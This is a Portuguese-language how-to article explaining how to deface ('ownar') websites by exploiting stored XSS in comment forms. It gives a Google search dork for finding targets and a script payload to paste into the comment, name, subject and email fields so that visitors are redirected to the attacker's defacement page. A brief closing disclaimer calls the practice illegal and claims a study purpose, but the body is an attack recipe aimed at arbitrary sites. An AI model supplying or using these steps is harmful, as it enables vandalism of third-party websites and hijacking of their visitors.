Como ownar um site
Muitas pessoas querem saber como ownar um site, porém boa parte destas pessoas nem mesmo sabe o que é ownar um site. Ownar é um termo hacker, para fazer o famoso defacement de um site, ou seja, hackear um site, tomar posse, de forma que quando um visitante for para o site este seja redirecionado para uma outra tela, que pertence a este hacker.
Para que o site possa ser ownado é preciso que exista alguma vulnerabilidade em seu código, o que é mais comum e simples de ser encontrado em sites com área de comentários, assim encontrando vulnerabilidade no XSS.
Instruções
-
1
Para averiguar quais são os sites com esta possível vulnerabilidade no XSS pode-se utilizar o Google, fazendo com que ele prepare uma listagem de sites com área de comentários, o que já encurtará bastante o caminho até o site a ser ownado.
-
2
Abra o Google e faça uma pesquisa com o seguinte termo, exatamente como está adiante:
inuri:"mostrar=comentários"
Ao clicar em pesquisar será feita uma listagem dos sites com área de comentários aberta, então basta escolher o site e ir fazer o seu comentário com o script:
< script >window.location.href="http://seuendereco.com.br"< / script >
Este script deverá ser colocado como comentário e também em todos os outros campos como nome, assunto e também no campo e-mail, porém no campo e-mail há uma diferença, ela deverá conter a “@” e o serviço de e-mail, ficando assim:
< script >window.location.href="http://seuendereco.com.br"< / script >@hotmail.com
-
3
Com tudo preenchido basta clicar em enviar. Caso o site possua uma vulnerabilidade no XSS o site já terá sido ownado e será direcionado para a sua página de defacement, que deve estar hospedada em algum servidor da web, que é justamente onde deverá alterar na parte http://seuendereco.com.br, para que seja redirecionado para o defacement.
Isto não funcionará com todos os sites, pois para funcionar é preciso que exista essa vulnerabilidade (a maioria possui rsrsr).
Dicas & Advertências
-
A prática de ownar sites é uma prática Hacker, portanto ilegal, este texto possui apenas o propósito de estudo, e também de alerta para os proprietários de sites para que tomem cuidado com suas vulnerabilidades, assim evitando que seu site seja ownado a qualquer momento, pois como pode-se ver é algo realmente muito simples e rápido de ser feito.Para evitar que problemas cheguem a seu site nada melhor do que conhecer exatamente por onde estes problemas chegam. Então, fique atento com sua área de comentários!
Artigos Relacionados
Avira free: como instalar
AVG: como instalar
Antivírus McAfee: como instalar
Antivírus grátis Panda: como instalar
Antivírus McAfee grátis: como instalar
Panda antivírus: como instalar
Microsoft Security: como instalar
Antivírus grátis McAfee: como instalar
Como instalar antivírus grátis
Norton antivírus: como instalar
Norton internet security: como instalar
Kaspersky antivírus 2011: como instalar
Antivírus Norton grátis: como instalar
McAfee antivírus: como instalar
AVG free: como instalar